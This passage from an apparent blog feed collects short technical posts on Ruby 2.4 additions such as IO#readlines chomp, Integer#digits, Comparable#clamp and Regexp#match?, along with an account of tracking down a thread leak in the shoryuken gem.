helpful.</p>]]></content>
    </entry><entry>
       <title><![CDATA[IO#readlines now accepts chomp flag as an argument]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/io-readlines-now-accepts-chomp-flag-as-an-argument"/>
      <updated>2017-03-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/io-readlines-now-accepts-chomp-flag-as-an-argument</id>
      <content type="html"><![CDATA[<p>Consider the following file which needs to be read in Ruby. We can use the<code>IO#readlines</code> method to get the lines in an array.</p><pre><code class="language-plaintext"># lotr.txtThree Rings for the Elven-kings under the sky,Seven for the Dwarf-lords in their halls of stone,Nine for Mortal Men doomed to die,One for the Dark Lord on his dark throneIn the Land of Mordor where the Shadows lie.</code></pre><h3>Ruby 2.3</h3><pre><code class="language-ruby">IO.readlines('lotr.txt')#=&gt; [&quot;Three Rings for the Elven-kings under the sky,\n&quot;, &quot;Seven for the Dwarf-lords in their halls of stone,\n&quot;, &quot;Nine for Mortal Men doomed to die,\n&quot;, &quot;One for the Dark Lord on his dark throne\n&quot;, &quot;In the Land of Mordor where the Shadows lie.&quot;]</code></pre><p>As we can see, the lines in the array have a <code>\n</code>, newline character, which isnot skipped while reading the lines. The newline character needs to be choppedin most of the cases. Prior to Ruby 2.4, it could be done in the following way.</p><pre><code class="language-ruby">IO.readlines('lotr.txt').map(&amp;:chomp)#=&gt; [&quot;Three Rings for the Elven-kings under the sky,&quot;, &quot;Seven for the Dwarf-lords in their halls of stone,&quot;, &quot;Nine for Mortal Men doomed to die,&quot;, &quot;One for the Dark Lord on his dark throne&quot;, &quot;In the Land of Mordor where the Shadows lie.&quot;]</code></pre><h3>Ruby 2.4</h3><p>Since it was a common requirement, Ruby team decided to<a href="https://bugs.ruby-lang.org/issues/12553">add</a> an optional parameter to the<code>readlines</code> method. So the same can now be achieved in Ruby 2.4 in the followingway.</p><pre><code class="language-ruby">IO.readlines('lotr.txt', chomp: true)#=&gt; [&quot;Three Rings for the Elven-kings under the sky,&quot;, &quot;Seven for the Dwarf-lords in their halls of stone,&quot;, &quot;Nine for Mortal Men doomed to die,&quot;, &quot;One for the Dark Lord on his dark throne&quot;, &quot;In the Land of Mordor where the Shadows lie.&quot;]</code></pre><p>Additionally, <code>IO#gets</code>, <code>IO#readline</code>, <code>IO#each_line</code>, <code>IO#foreach</code> methodsalso have been modified to accept an optional chomp flag.</p>]]></content>
    </entry><entry>
       <title><![CDATA[open-uri in Ruby 2.4 allows http to https redirection]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/open-uri-in-ruby-2-4-allows-http-to-https-redirection"/>
      <updated>2017-03-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/open-uri-in-ruby-2-4-allows-http-to-https-redirection</id>
      <content type="html"><![CDATA[<p>In Ruby 2.3, if the argument to <code>open-uri</code> is http and the host redirects tohttps , then <code>open-uri</code> would throw an error.</p><pre><code class="language-ruby">&gt; require 'open-uri'&gt; open('http://www.google.com/gmail')RuntimeError: redirection forbidden: http://www.google.com/gmail -&gt; https://www.google.com/gmail/</code></pre><p>To get around this issue, we could use<a href="https://github.com/open-uri-redirections/open_uri_redirections">open_uri_redirections</a>gem.</p><pre><code class="language-ruby">&gt; require 'open-uri'&gt; require 'open_uri_redirections'&gt; open('http://www.google.com/gmail/', :allow_redirections =&gt; :safe)=&gt; #&lt;Tempfile:/var/folders/jv/fxkfk9_10nb_964rvrszs2540000gn/T/open-uri20170228-41042-2fffoa&gt;</code></pre><h3>Ruby 2.4</h3><p>In Ruby 2.4, this issue is <a href="https://bugs.ruby-lang.org/issues/859">fixed</a>. Sonow http to https redirection is possible using open-uri.</p><pre><code class="language-ruby">&gt; require 'open-uri'&gt; open('http://www.google.com/gmail')=&gt; #&lt;Tempfile:/var/folders/jv/fxkfk9_10nb_964rvrszs2540000gn/T/open-uri20170228-41077-1bkm1dv&gt;</code></pre><p>Note that redirection from https to http will raise an error, like it did inprevious versions, since that has possible security concerns.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 now has Dir.empty? and File.empty? methods]]></title>
       <author><name>Ratnadeep Deshmane</name></author>
      <link href="https://www.bigbinary.com/blog/dir-emtpy-included-in-ruby-2-4"/>
      <updated>2017-02-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/dir-emtpy-included-in-ruby-2-4</id>
      <content type="html"><![CDATA[<p>In Ruby, to check if a given directory is empty or not, we check it as</p><pre><code class="language-ruby">Dir.entries(&quot;/usr/lib&quot;).size == 2       #=&gt; falseDir.entries(&quot;/home&quot;).size == 2          #=&gt; true</code></pre><p>Every directory in Unix filesystem contains at least two entries. These are<code>.</code>(current directory) and <code>..</code>(parent directory).</p><p>Hence, the code above checks if there are only two entries and if so, consider adirectory empty.</p><p>Again, this code only works for UNIX filesystems and fails on Windows machines,as Windows directories don't have <code>.</code> or <code>..</code>.</p><h2>Dir.empty?</h2><p>Considering all this, Ruby has finally<a href="https://bugs.ruby-lang.org/issues/10121">included</a> a new method <code>Dir.empty?</code>that takes directory path as argument and returns boolean as an answer.</p><p>Here is an example.</p><pre><code class="language-ruby">Dir.empty?('/Users/rtdp/Documents/posts')   #=&gt; true</code></pre><p>Most importantly this method works correctly in all platforms.</p><h2>File.empty?</h2><p>To check if a file is empty, Ruby has <code>File.zero?</code> method. This checks if thefile exists and has zero size.</p><pre><code class="language-ruby">File.zero?('/Users/rtdp/Documents/todo.txt')    #=&gt; true</code></pre><p>After introducing <code>Dir.empty?</code> it makes sense to<a href="https://bugs.ruby-lang.org/issues/9969">add</a> <code>File.empty?</code> as an alias to<code>File.zero?</code></p><pre><code class="language-ruby">File.empty?('/Users/rtdp/Documents/todo.txt')    #=&gt; true</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 Integer#digits extract digits in place-value]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-implements-integer-digits-for-extracting-digits-in-place-value-notation"/>
      <updated>2017-02-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-implements-integer-digits-for-extracting-digits-in-place-value-notation</id>
      <content type="html"><![CDATA[<p>If we want to extract all the digits of an integer<a href="https://en.wikipedia.org/wiki/Positional_notation">from right to left</a>, thenewly added <a href="https://bugs.ruby-lang.org/issues/12447">Integer#digits</a> methodwill come in handy.</p><pre><code class="language-ruby">567321.digits#=&gt; [1, 2, 3, 7, 6, 5]567321.digits[3]#=&gt; 7</code></pre><p>We can also supply a different base as an argument.</p><pre><code class="language-ruby">0123.digits(8)#=&gt; [3, 2, 1]0xabcdef.digits(16)#=&gt; [15, 14, 13, 12, 11, 10]</code></pre><h4>Use case of digits</h4><p>We can use <code>Integer#digits</code> to sum all the digits in an integer.</p><pre><code class="language-ruby">123.to_s.chars.map(&amp;:to_i).sum#=&gt; 6123.digits.sum#=&gt; 6</code></pre><p>Also while calculating checksums like<a href="https://en.wikipedia.org/wiki/Luhn_algorithm">Luhn</a> and<a href="https://en.wikipedia.org/wiki/Verhoeff_algorithm">Verhoeff</a>, <code>Integer#digits</code>will help in reducing string allocation.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 adds compare by identity functionality]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-adds-compare-by-identity-functionality-for-sets"/>
      <updated>2016-12-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-adds-compare-by-identity-functionality-for-sets</id>
      <content type="html"><![CDATA[<p>In Ruby, <code>Object#equal?</code> method is used to compare two objects by theiridentity, that is, the two objects are exactly the same or not. Ruby also has<code>Object#eql?</code> method which returns true if two objects have the same value.</p><p>For example:</p><pre><code class="language-ruby">str1 = &quot;Sample string&quot;str2 = str1.dupstr1.eql?(str2) #=&gt; truestr1.equal?(str2) #=&gt; false</code></pre><p>We can see that object ids of the objects are not same.</p><pre><code class="language-ruby">str1.object_id #=&gt; 70334175057920str2.object_id #=&gt; 70334195702480</code></pre><p>In ruby, <a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/set/rdoc/Set.html">Set</a> doesnot allow duplicate items in its collection. To determine if two items are equalor not in a <code>Set</code> ruby uses <code>Object#eql?</code> and not <code>Object#equal?</code>.</p><p>So if we want to add two different objects with the same values in a set, thatwould not have been possible prior to Ruby 2.4 .</p><h3>Ruby 2.3</h3><pre><code class="language-ruby">require 'set'set = Set.new #=&gt; #&lt;Set: {}&gt;str1 = &quot;Sample string&quot; #=&gt; &quot;Sample string&quot;str2 = str1.dup #=&gt; &quot;Sample string&quot;set.add(str1) #=&gt; #&lt;Set: {&quot;Sample string&quot;}&gt;set.add(str2) #=&gt; #&lt;Set: {&quot;Sample string&quot;}&gt;</code></pre><p>But with the new<a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/set/rdoc/Set.html#method-i-compare_by_identity">Set#compare_by_identity method introduced in Ruby 2.4</a>,sets can now compare its values using <code>Object#equal?</code> and check for the exactsame objects.</p><h3>Ruby 2.4</h3><pre><code class="language-ruby">require 'set'set = Set.new.compare_by_identity #=&gt; #&lt;Set: {}&gt;str1 = &quot;Sample string&quot; #=&gt; &quot;Sample string&quot;str2 = str1.dup #=&gt; &quot;Sample string&quot;set.add(str1) #=&gt; #&lt;Set: {&quot;Sample string&quot;}&gt;set.add(str2) #=&gt; #&lt;Set: {&quot;Sample string&quot;, &quot;Sample string&quot;}&gt;</code></pre><h2>Set#compare_by_identity?</h2><p>Ruby 2.4 also provides the<a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/set/rdoc/Set.html#method-i-compare_by_identity-3F">compare_by_identity? method</a>to know if the set will compare its elements by their identity.</p><pre><code class="language-ruby">require 'set'set1= Set.new #=&gt; #&lt;Set: {}&gt;set2= Set.new.compare_by_identity #=&gt; #&lt;Set: {}&gt;set1.compare_by_identity? #=&gt; falseset2.compare_by_identity? #=&gt; true</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 MatchData#values_at]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.4-adds-matchdata-values-at-for-extracting-named-and-positional-capture-groups"/>
      <updated>2016-12-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.4-adds-matchdata-values-at-for-extracting-named-and-positional-capture-groups</id>
      <content type="html"><![CDATA[<h3>Ruby 2.3</h3><p>We can use <code>MatchData#[]</code> to extract named capture and positional capturegroups.</p><pre><code class="language-ruby">pattern=/(?&lt;number&gt;\d+) (?&lt;word&gt;\w+)/pattern.match('100 thousand')[:number]#=&gt; &quot;100&quot;pattern=/(\d+) (\w+)/pattern.match('100 thousand')[2]#=&gt; &quot;thousand&quot;</code></pre><p>Positional capture groups could also be extracted using <code>MatchData#values_at</code>.</p><pre><code class="language-ruby">pattern=/(\d+) (\w+)/pattern.match('100 thousand').values_at(2)#=&gt; [&quot;thousand&quot;]</code></pre><h3>Changes in Ruby 2.4</h3><p>In Ruby 2.4, we can pass string or symbol to extract named capture groups tomethod <code>#values_at</code>.</p><pre><code class="language-ruby">pattern=/(?&lt;number&gt;\d+) (?&lt;word&gt;\w+)/pattern.match('100 thousand').values_at(:number)#=&gt; [&quot;100&quot;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 adds infinite? and finite? methods to Numeric]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-adds-infinite-method-to-numeric"/>
      <updated>2016-12-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-adds-infinite-method-to-numeric</id>
      <content type="html"><![CDATA[<h3>Prior to Ruby 2.4</h3><p>Prior to Ruby 2.4, Float and BigDecimal responded to methods <code>infinite?</code> and<code>finite?</code>, whereas Fixnum and Bignum did not.</p><h4>Ruby 2.3</h4><pre><code class="language-ruby">#infinite?5.0.infinite?=&gt; nilFloat::INFINITY.infinite?=&gt; 15.infinite?NoMethodError: undefined method `infinite?' for 5:Fixnum</code></pre><pre><code class="language-ruby">#finite?5.0.finite?=&gt; true5.finite?NoMethodError: undefined method `finite?' for 5:Fixnum</code></pre><h4>Ruby 2.4</h4><p>To make behavior for all the numeric values to be consistent,<a href="https://bugs.ruby-lang.org/issues/12039">infinite? and finite? were added to Fixnum and Bignum</a>even though they would always return nil.</p><p>This gives us ability to call these methods irrespective of whether they aresimple numbers or floating numbers.</p><pre><code class="language-ruby">#infinite?5.0.infinite?=&gt; nilFloat::INFINITY.infinite?=&gt; 15.infinite?=&gt; nil</code></pre><pre><code class="language-ruby">#finite?5.0.finite?=&gt; true5.finite?=&gt; true</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 adds Comparable#clamp method]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-adds-comparable-clamp-method"/>
      <updated>2016-12-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-adds-comparable-clamp-method</id>
      <content type="html"><![CDATA[<p>In Ruby 2.4,<a href="https://bugs.ruby-lang.org/issues/10594">clamp method is added to the Comparable module</a>.This method can be used to clamp an object within a specific range of values.</p><p><code>clamp</code> method takes min and max as two arguments to define the range of valuesin which the given argument should be clamped.</p><h4>Clamping numbers</h4><p><code>clamp</code> can be used to keep a number within the range of min, max.</p><pre><code class="language-ruby">10.clamp(5, 20)=&gt; 1010.clamp(15, 20)=&gt; 1510.clamp(0, 5)=&gt; 5</code></pre><h4>Clamping strings</h4><p>Similarly, strings can also be clamped within a range.</p><pre><code class="language-ruby">&quot;e&quot;.clamp(&quot;a&quot;, &quot;s&quot;)=&gt; &quot;e&quot;&quot;e&quot;.clamp(&quot;f&quot;, &quot;s&quot;)=&gt; &quot;f&quot;&quot;e&quot;.clamp(&quot;a&quot;, &quot;c&quot;)=&gt; &quot;c&quot;&quot;this&quot;.clamp(&quot;thief&quot;, &quot;thin&quot;)=&gt; &quot;thin&quot;</code></pre><p>Internally, this method relies on applying the<a href="https://en.wikipedia.org/wiki/Three-way_comparison">spaceship &lt;=&gt; operator</a>between the object and the min &amp; max arguments.</p><pre><code class="language-ruby">if x &lt;=&gt; min &lt; 0, x = min;if x &lt;=&gt; max &gt; 0 , x = maxelse x</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[New liberal_parsing option for parsing bad CSV data]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-introduces-liberal_parsing-option-for-parsing-bad-csv-data"/>
      <updated>2016-11-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-introduces-liberal_parsing-option-for-parsing-bad-csv-data</id>
      <content type="html"><![CDATA[<p>Comma-Separated Values (CSV) is a widely used data format and almost everylanguage has a module to parse it. In Ruby, we have<a href="http://ruby-doc.org/stdlib-2.3.2/libdoc/csv/rdoc/CSV.html">CSV class</a> to dothat.</p><p>According to <a href="https://tools.ietf.org/html/rfc4180#page-4">RFC 4180</a>, we cannothave unescaped double quotes in CSV input since such data can't be parsed.</p><p>We get <code>MalformedCSVError</code> error when the CSV data does not conform to RFC 4180.</p><p>Ruby 2.4 has added a<a href="https://bugs.ruby-lang.org/issues/11839">liberal parsing option</a> to parse suchbad data. When it is set to <code>true</code>, Ruby will try to parse the data even whenthe data does not conform to RFC 4180.</p><pre><code class="language-ruby"># Before Ruby 2.4&gt; CSV.parse_line('one,two&quot;,three,four')CSV::MalformedCSVError: Illegal quoting in line 1.# With Ruby 2.4&gt; CSV.parse_line('one,two&quot;,three,four', liberal_parsing: true)=&gt; [&quot;one&quot;, &quot;two\&quot;&quot;, &quot;three&quot;, &quot;four&quot;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Enumerable#chunk not mandatory in Ruby 2.4]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/passing-block-with-enumerable-chunk-is-not-mandatory-in-ruby-2-4"/>
      <updated>2016-11-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/passing-block-with-enumerable-chunk-is-not-mandatory-in-ruby-2-4</id>
      <content type="html"><![CDATA[<p><a href="https://ruby-doc.org/core-2.3.2/Enumerable.html#method-i-chunk">Enumerable#chunk</a>method can be used on enumerator object to group consecutive items based on thevalue returned from the block passed to it.</p><pre><code class="language-ruby">[1, 4, 7, 10, 2, 6, 15].chunk { |item| item &gt; 5 }.each { |values| p values }=&gt; [false, [1, 4]][true, [7, 10]][false, [2]][true, [6, 15]]</code></pre><p>Prior to Ruby 2.4, passing a block to <code>chunk</code> method was must.</p><pre><code class="language-ruby">array = [1,2,3,4,5,6]array.chunk=&gt; ArgumentError: no block given</code></pre><h3>Enumerable#chunk without block in Ruby 2.4</h3><p>In Ruby 2.4, we will be able to use<a href="https://bugs.ruby-lang.org/issues/2172">chunk without passing block</a>. It justreturns the enumerator object which we can use to chain further operations.</p><pre><code class="language-ruby">array = [1,2,3,4,5,6]array.chunk=&gt; &lt;Enumerator: [1, 2, 3, 4, 5, 6]:chunk&gt;</code></pre><h3>Reasons for this change</h3><p>Let's take the<a href="http://stackoverflow.com/questions/8621733/how-do-i-summarize-array-of-integers-as-an-array-of-ranges">case of listing</a>consecutive integers in an array of ranges.</p><pre><code class="language-ruby"># Before Ruby 2.4integers = [1,2,4,5,6,7,9,13]integers.enum_for(:chunk).with_index { |x, idx| x - idx }.map do |diff, group|  [group.first, group.last]end=&gt; [[1,2],[4,7],[9,9],[13,13]]</code></pre><p>We had to use<a href="http://ruby-doc.org/core-2.3.2/Object.html#method-i-enum_for">enum_for</a> here as<code>chunk</code> can't be called without block.</p><p><code>enum_for</code> creates a new enumerator object which will enumerate by calling themethod passed to it. In this case the method passed was <code>chunk</code>.</p><p>With Ruby 2.4, we can use <code>chunk</code> method directly without using <code>enum_for</code> as itdoes not require a block to be passed.</p><pre><code class="language-ruby"># Ruby 2.4integers = [1,2,4,5,6,7,9,13]integers.chunk.with_index { |x, idx| x - idx }.map do |diff, group|  [group.first, group.last]end=&gt; [[1,2],[4,7],[9,9],[13,13]]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 unifies Fixnum and Bignum into Integer]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-unifies-fixnum-and-bignum-into-integer"/>
      <updated>2016-11-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-unifies-fixnum-and-bignum-into-integer</id>
      <content type="html"><![CDATA[<p>Ruby uses <code>Fixnum</code> class for representing small numbers and <code>Bignum</code> class forbig numbers.</p><pre><code class="language-ruby"># Before Ruby 2.41.class         #=&gt; Fixnum(2 ** 62).class #=&gt; Bignum</code></pre><p>In general routine work we don't have to worry about whether the number we aredealing with is <code>Bignum</code> or <code>Fixnum</code>. It's just an implementation detail.</p><p>Interestingly, Ruby also has <code>Integer</code> class which is superclass for <code>Fixnum</code>and <code>Bignum</code>.</p><p>Starting with Ruby 2.4, Fixnum and Bignum<a href="https://bugs.ruby-lang.org/issues/12005">are unified into Integer</a>.</p><pre><code class="language-ruby"># Ruby 2.41.class         #=&gt; Integer(2 ** 62).class #=&gt; Integer</code></pre><p>Starting with Ruby 2.4 usage of Fixnum and Bignum constants<a href="https://bugs.ruby-lang.org/issues/12739">is deprecated</a>.</p><pre><code class="language-ruby"># Ruby 2.4&gt;&gt; Fixnum(irb):6: warning: constant ::Fixnum is deprecated=&gt; Integer&gt;&gt; Bignum(irb):7: warning: constant ::Bignum is deprecated=&gt; Integer</code></pre><h2>How to know if a number is Fixnum, Bignum or Integer?</h2><p>We don't have to worry about this change most of the times in our applicationcode. But libraries like Rails use the class of numbers for taking certaindecisions. These libraries need to support both Ruby 2.4 and previous versionsof Ruby.</p><p>Easiest way to know whether the Ruby version is using integer unification or notis to check class of 1.</p><pre><code class="language-ruby"># Ruby 2.41.class #=&gt; Integer# Before Ruby 2.41.class #=&gt; Fixnum</code></pre><p>Look at <a href="https://github.com/rails/rails/pull/25056">PR #25056</a> to see how Railsis handling this case.</p><p>Similarly Arel is<a href="https://github.com/rails/arel/commit/dc85a6e9c74942945ad696f5da4d82490a85b865">also supporting</a>both Ruby 2.4 and previous versions of Ruby.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 implements Array#min and Array#max]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-implements-array-min-and-max"/>
      <updated>2016-11-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-implements-array-min-and-max</id>
      <content type="html"><![CDATA[<p>Ruby has <code>Enumerable#min</code> and <code>Enumerable#max</code> which can be used to find theminimum and the maximum value in an Array.</p><pre><code class="language-ruby">(1..10).to_a.max#=&gt; 10(1..10).to_a.method(:max)#=&gt; #&lt;Method: Array(Enumerable)#max&gt;</code></pre><p>Ruby 2.4 adds <a href="https://bugs.ruby-lang.org/issues/12172">Array#min and Array#max</a>which are much faster than <code>Enumerable#max</code> and <code>Enuermable#min</code>.</p><p>Following benchmark is based on<a href="https://blog.blockscore.com/new-features-in-ruby-2-4">https://blog.blockscore.com/new-features-in-ruby-2-4</a>.</p><pre><code class="language-ruby">Benchmark.ips do |bench|  NUM1 = 1_000_000.times.map { rand }  NUM2 = NUM1.dup  ENUM_MAX = Enumerable.instance_method(:max).bind(NUM1)  ARRAY_MAX = Array.instance_method(:max).bind(NUM2)  bench.report('Enumerable#max') do    ENUM_MAX.call  end  bench.report('Array#max') do    ARRAY_MAX.call  end  bench.compare!endWarming up --------------------------------------      Enumerable#max     1.000  i/100ms           Array#max     2.000  i/100msCalculating -------------------------------------      Enumerable#max     17.569  ( 5.7%) i/s -     88.000  in   5.026996s           Array#max     26.703  ( 3.7%) i/s -    134.000  in   5.032562sComparison:           Array#max:       26.7 i/s      Enumerable#max:       17.6 i/s - 1.52x  slowerBenchmark.ips do |bench|  NUM1 = 1_000_000.times.map { rand }  NUM2 = NUM1.dup  ENUM_MIN = Enumerable.instance_method(:min).bind(NUM1)  ARRAY_MIN = Array.instance_method(:min).bind(NUM2)  bench.report('Enumerable#min') do    ENUM_MIN.call  end  bench.report('Array#min') do    ARRAY_MIN.call  end  bench.compare!endWarming up --------------------------------------      Enumerable#min     1.000  i/100ms           Array#min     2.000  i/100msCalculating -------------------------------------      Enumerable#min     18.621  ( 5.4%) i/s -     93.000  in   5.007244s           Array#min     26.902  ( 3.7%) i/s -    136.000  in   5.064815sComparison:           Array#min:       26.9 i/s      Enumerable#min:       18.6 i/s - 1.44x  slower</code></pre><p>This benchmark shows that the new methods <code>Array#max</code> and <code>Array#min</code> are about1.5 times faster than <code>Enumerable#max</code> and <code>Enumerable#min</code>.</p><p>Similar to <code>Enumerable#max</code> and <code>Enumerable#min</code>, <code>Array#max</code> and <code>Array#min</code>also assumes that the objects use<a href="https://ruby-doc.org/core-2.3.2/Comparable.html">Comparable</a> mixin to define<code>spaceship &lt;=&gt;</code> operator for comparing the elements.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Hunting down a memory leak in shoryuken]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/hunting-down-a-memory-leak-in-shoryuken"/>
      <updated>2016-11-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/hunting-down-a-memory-leak-in-shoryuken</id>
      <content type="html"><![CDATA[<p>This is a story of how we found and fixed memory leak in<a href="https://github.com/phstc/shoryuken/">shoryuken</a>.</p><p>We use shoryuken to process SQS messages inside of docker containers. A whileback we noticed that memory was growing without bound. After every few days, wehad to restart all the docker containers as a temporary workaround.</p><p>Since the workers were inside of a docker container we had limited tools.So we went ahead with the UNIX way of investigating the issue.</p><p>First we noticed that the number of threads inside the worker was high, 115 inour case. shoryuken boots up all the worker threads at<a href="https://github.com/phstc/shoryuken/blob/cea4f5f475b2e756f82e367152db831f9e2cc6f5/lib/shoryuken/manager.rb#L22">startup</a>.</p><pre><code class="language-ruby"># ps --no-header uH p &lt;PID&gt; | wc -l#=&gt; 115</code></pre><p>The proc filesystem exposes a lot of useful information of all the runningprocesses. ``/proc/[pid]/task` directory has information about all the threadsof a process.</p><p>Some of the threads with lower ID's were executing syscall 23<a href="http://man7.org/linux/man-pages/man2/select.2.html">(select)</a> and271 <a href="https://linux.die.net/man/2/ppoll">(ppoll)</a>.These threads were waitingfor a message to arrive in the SQS queue, but most of the threads wereexecuting syscall 202<a href="http://man7.org/linux/man-pages/man2/futex.2.html">(futex)</a>.</p><p>At this point we had an idea about the root cause of the memory leak -it was due to the workerstarting a lot of threads which were not getting terminated.We wanted to knowhow and when these threads are started.</p><p>Ruby 2.0.0 introduced <a href="http://ruby-doc.org/core-2.0.0/TracePoint.html">tracepoint</a>,which provides an interface to a lot ofinternal ruby events like when a exception is raised, when a method is called orwhen a method returns, etc.</p><p>We added the following code to our workers.</p><pre><code class="language-ruby">tc = TracePoint.new(:thread_begin, :thread_end) do |tp|  puts tp.event  puts tp.self.classendtc.enable</code></pre><p>Executing the ruby workers with tracing enabled revealed that a new<code>Celluloid::Thread</code> was being created before each method was processed and thatthread was never terminated. Hence the number of zombie threads in the workerwas growing with the number messages processed.</p><pre><code class="language-ruby">thread_beginCelluloid::Thread[development] [306203a5-3c07-4174-b974-77390e8a4fc3] SQS Message: ...snip...thread_beginCelluloid::Thread[development] [2ce2ed3b-d314-46f1-895a-f1468a8db71e] SQS Message: ...snip...</code></pre><p>Unfortunately tracepoint didn't pinpoint the place where the thread was started,hence we added a couple of puts statements to investigate the issue further.</p><p>After a lot of debugging, we were able to find that a new thread was started toincrease the <a href="https://github.com/phstc/shoryuken/blob/a40e6b26e2dfbc4a78a36198d02010dce66a977e/lib/shoryuken/middleware/server/auto_extend_visibility.rb#L48">visibility time</a>of the SQS message in a shoryuken middleware whenauto_visibility_timeout was true.</p><p>The fix was to<a href="https://github.com/phstc/shoryuken/pull/267">terminate</a>the thread after the work is done.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 Extracting captured data from Regexp results]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-adds-better-support-for-extracting-captured-data-from-regexp-match-results"/>
      <updated>2016-11-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-adds-better-support-for-extracting-captured-data-from-regexp-match-results</id>
      <content type="html"><![CDATA[<p>Ruby has <a href="https://ruby-doc.org/core-2.2.0/MatchData.html">MatchData</a> type whichis returned by <code>Regexp#match</code> and <code>Regexp.last_match</code>.</p><p>It has methods <code>#names</code> and <code>#captures</code> to return the names used for capturingand the actual captured data respectively.</p><pre><code class="language-ruby">pattern = /(?&lt;number&gt;\d+) (?&lt;word&gt;\w+)/match_data = pattern.match('100 thousand')#=&gt; #&lt;MatchData &quot;100 thousand&quot; number:&quot;100&quot; word:&quot;thousand&quot;&gt;&gt;&gt; match_data.names=&gt; [&quot;number&quot;, &quot;word&quot;]&gt;&gt; match_data.captures=&gt; [&quot;100&quot;, &quot;thousand&quot;]</code></pre><p>If we want all named captures in a key value pair, we have to combine the resultof names and captures.</p><pre><code class="language-ruby">match_data.names.zip(match_data.captures).to_h#=&gt; {&quot;number&quot;=&gt;&quot;100&quot;, &quot;word&quot;=&gt;&quot;thousand&quot;}</code></pre><p>Ruby 2.4 adds <a href="https://bugs.ruby-lang.org/issues/11999"><code>#named_captures</code></a> whichreturns both the name and data of the capture groups.</p><pre><code class="language-ruby">pattern=/(?&lt;number&gt;\d+) (?&lt;word&gt;\w+)/match_data = pattern.match('100 thousand')match_data.named_captures#=&gt; {&quot;number&quot;=&gt;&quot;100&quot;, &quot;word&quot;=&gt;&quot;thousand&quot;}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 Regexp#match? not polluting global variables]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-implements-regexp-match-without-polluting-global-variables"/>
      <updated>2016-11-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-implements-regexp-match-without-polluting-global-variables</id>
      <content type="html"><![CDATA[<p>Ruby has many ways to match with a regular expression.</p><h4>Regexp#===</h4><p>It returns true/false and sets the $~ global variable.</p><pre><code class="language-ruby">/stat/ === &quot;case statements&quot;#=&gt; true$~#=&gt; #&lt;MatchData &quot;stat&quot;&gt;</code></pre><h3>Regexp#=~</h3><p>It returns integer position it matched or nil if no match. It also sets the $~global variable.</p><pre><code class="language-ruby">/stat/ =~ &quot;case statements&quot;#=&gt; 5$~#=&gt; #&lt;MatchData &quot;stat&quot;&gt;</code></pre><h3>Regexp#match</h3><p>It returns match data and also sets the $~ global variable.</p><pre><code class="language-ruby">/stat/.match(&quot;case statements&quot;)#=&gt; #&lt;MatchData &quot;stat&quot;&gt;$~#=&gt; #&lt;MatchData &quot;stat&quot;&gt;</code></pre><h3>Ruby 2.4 adds Regexp#match?</h3><p><a href="https://bugs.ruby-lang.org/issues/8110">This new method</a> just returnstrue/false and does not set any global variables.</p><pre><code class="language-ruby">/case/.match?(&quot;case statements&quot;)#=&gt; true</code></pre><p>So <code>Regexp#match?</code> is good option when we are only concerned with the fact thatregex matches or not.</p><p><code>Regexp#match?</code> is also faster than its counterparts as it reduces objectallocation by not creating a back reference and changing <code>$~</code>.</p><pre><code class="language-ruby">require 'benchmark/ips'Benchmark.ips do |bench|  EMAIL_ADDR = 